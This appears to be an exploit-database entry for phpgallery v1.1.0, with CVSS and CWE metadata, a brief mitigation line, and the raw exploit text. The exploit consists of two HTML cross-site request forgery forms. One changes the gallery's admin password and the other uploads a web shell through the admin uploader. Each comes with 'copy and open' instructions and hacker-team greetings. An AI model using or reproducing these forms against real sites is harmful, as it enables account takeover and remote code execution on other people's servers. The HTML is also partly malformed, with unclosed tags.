REMOTE CSRF Change Admin Password by OR4NG.M4N & REMOTE CSRF upload ShElL by OR4NG.M4N

vendor:

phpgallery

by:

Or4nG.M4N

8,8

CVSS

HIGH

Cross-Site Request Forgery (CSRF)

352

CWE

Product Name: phpgallery

Affected Version From: phpgallery v 1.1.0

Affected Version To: phpgallery v 1.1.0

Patch Exists: N/A

Related CWE: N/A

CPE: a:phpgallery:phpgallery:1.1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

n/a

REMOTE CSRF Change Admin Password by OR4NG.M4N & REMOTE CSRF upload ShElL by OR4NG.M4N

This exploit allows an attacker to change the admin password of the phpgallery v 1.1.0 software and upload a shell to the gallery. The attacker can use the code provided by the author and save it in a file csrf.html. When the file is opened, the attacker can change the admin password and upload a shell to the gallery.

Mitigation:

Implementing CSRF protection tokens, using same-site cookies, and using CAPTCHAs can help mitigate CSRF attacks.

Source

Exploit-DB raw data:

-------------------------------------------------------------------------
# Software      : phpgallery v 1.1.0                                                                                :                                               
# Author        : Or4nG.M4N                                               
# Date          : n/a    
# Dork          : Forbidden   
# Software Link: http://www.hotscripts.com/listing/phpgallery/                                                                                          :
-------------------------------------------------------------------------
  +---+[REMOTE CSRF Change Admin Password by OR4NG.M4N]+---+
<html>                                                                     
<head>                                                                     
<title>REMOTE CSRF Change Admin Password by OR4NG.M4N</head>               
<body>                                                                     
<form action="http://domain/[pwd]/admin/do_change_info.php" method="post"> 
<br>                                                                       
<input name="username" id="username" type="text" value="Or4nG" >           
<br>                                                                       
<input name="password" id="password" type="password" value="Ro0t" >        
<br>                                                                     
<input name="submit" onclick="MM_validateForm('username','','R','password','','R');return document.MM_returnValue" value="Submit" type="submit">

how to use: copy This code and seve in file csrf.html > and open Enjoy


          +---+[REMOTE CSRF upload ShElL by OR4NG.M4N]+---+   
<html>                                                                     
<head>                                                                     
<title>REMOTE CSRF upload ShElL by OR4NG.M4N</head>               
<body>		  
 <form enctype="multipart/form-data" action="http://domain/[pwd]/admin/uploader.php" method="POST">
Choose a file to upload to the gallery:<br>                                
<input name="uploadedfile" type="file" />                                  
<p align="left">Picture Caption:<br>                                       
<input name="caption" type="text" id="caption" size="45">                  
<p align="left">                                                           
<input name="Submit" type="submit" id="Submit" onClick="MM_showHideLayers('loading','','show')" value="Upload File" />

how to use: copy This code and seve in file csrf.html > and open Enjoy

--------------------------------------------------------
# Email - priv8te@hotmail.com
# GreeTz 2 - i-Hmx - Demetre - SadhacKer - The injector ]
# P0c TeaM - SarBoT511 - YoU - RGH - MY ]
# Home - www.v4-team.com - p0c.cc - inj3ct0r.com ]
---------------------------------------------------------